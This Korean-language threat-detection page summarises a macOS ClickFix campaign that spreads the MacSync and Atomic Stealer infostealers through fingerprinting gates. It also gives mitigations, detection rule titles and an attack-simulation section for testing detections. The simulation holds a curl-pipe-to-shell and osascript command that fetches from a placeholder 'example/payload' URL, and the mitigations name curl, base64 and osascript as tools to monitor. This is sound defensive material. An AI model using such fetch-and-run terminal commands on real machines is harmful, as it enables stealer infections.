macOS ClickFix 캠페인, 은폐된 감염 게이트로 진화
Detection stack
- AIDR
- Alert
- ETL
- Query
개요
macOS ClickFix 캠페인은 정교한 서버 측 지문 인식 게이트를 통해 MacSync 및 Atomic Stealer (AMOS)를 포함한 정보 탈취기를 배포하고 있습니다. 이 운영은 알고리즘적으로 생성된 도메인과 브라우저 지문을 사용하여 악성 페이로드가 실제 macOS 사용자에게만 전달되도록 하여 자동화된 보안 분석 및 크롤러를 피할 수 있도록 돕습니다. 이러한 진화는 광범위한 사회 공학에서 고도로 타겟화되고 은폐된 전달 기술로의 변화를 의미합니다.
조사
Microsoft Threat Intelligence는 캠페인을 발견하기 위해 고유한 명명 패턴을 공유하는 250개 이상의 도메인 클러스터를 추적했습니다. 조사는 직접적인 유인 전달에서 가벼운 JavaScript 프로파일링을 포함한 2단계 프로세스로의 전환을 밝혀냈습니다. WebGL 신호, 시간대 오프셋 및 반분석 검사를 평가함으로써 연구자들은 인프라가 어떻게 macOS 환경을 선택적으로 타겟팅하고 비적격 요청에는 양성 미끼 콘텐츠를 제공하는지를 결정했습니다.
완화
조직은 사용자가 터미널에 명령을 붙여넣을 필요가 없다는 점을 교육해야 합니다. 보안 팀은 터미널 활동에서 다음과 같은 유틸리티를 포함하는 수상한 행동을 모니터링해야 합니다 curl, base64, gunzip, 또는 osascript, 특히 웹 브라우징 후에 트리거되는 경우. 키체인 데이터에 대한 보호를 강화하고 민감한 파일의 무단 보관을 모니터링하면 성공적인 침해의 영향을 줄일 수 있습니다.
응답
수상한 터미널 실행 또는 자격 증명 저장소에 대한 무단 액세스가 감지되면, 응답자는 영향을 받는 macOS 엔드포인트를 즉시 격리해야 합니다. 낮은 평판의 도메인으로의 아웃바운드 연결을 조사하고, 특히 /curl/ 요청 패턴에 주의를 기울여야 합니다. 식별된 악성 스테이징 호스트는 차단하고, 최근 셸 기록을 인코딩되거나 난독화된 명령 실행을 위해 검토해야 합니다.
공격 흐름
탐지
의심스러운 Curl 실행 시도 [MacOS] (cmdline을 통해)
Proof of Value
비정상적으로 상위 레벨 도메인(TLD) DNS 요청으로 인한 의심스러운 명령 및 제어 (dns를 통해)
Proof of Value
가능한 Base64 인코딩된 문자열 조작 [MacOS] (cmdline을 통해)
Proof of Value
의심스러운 도메인과 예기치 않은 지리/브라우저로의 아웃바운드 연결 탐지 [Firewall]
Proof of Value
ClickFix 캠페인을 통한 악성 macOS 터미널 명령 실행 [Linux 프로세스 생성]
Proof of Value
시뮬레이션 실행
사전 요구 사항: Telemetry & Baseline Pre-flight Check가 통과해야 합니다.
근거: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적의 기술(TTP)의 정확한 실행을 설명합니다. 명령 및 서사는 식별된 TTP를 직접 반영해야 하며, 탐지 논리에 의해 예상되는 정확한 텔레메트리를 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련 없는 예는 오진을 초래합니다.
-
공격 서사 및 명령: 적은 웹 브라우저에 가짜 오류 메시지를 표시함으로써 ClickFix 캠페인을 시작하고 사용자가 터미널에 특정 명령을 붙여넣어 “오류 수정”을 지시합니다. 공격자의 목표는 지속성을 확립하거나 악성 코드를 다운로드하는 것입니다. 명령은
curl를 사용하여 원격 서버에서 악성 AppleScript 페이로드를 끌어와osascript -e로 즉시 메모리에서 실행하여 전통적인 파일 기반 스캐닝을 우회합니다. -
회귀 테스트 스크립트:
# ClickFix 시뮬레이션: 페이로드 가져오고 osascript를 통해 실행하기 # 주의: 실제 감염을 피하기 위해 무해한 echo 명령을 사용하여 원격 페이로드를 시뮬레이션합니다. curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Security Alert: System Update Required""' # 탐지 규칙이 트리거되도록 정확한 패턴을 실행합니다: osascript -e 'say "This is a simulated attack"' -
정리 명령:
# 이 특정 명령 줄 실행에서 디스크에 파일이 쓰여지지 않지만, 백그라운드 프로세스가 종료되도록 합니다. killall osascript || true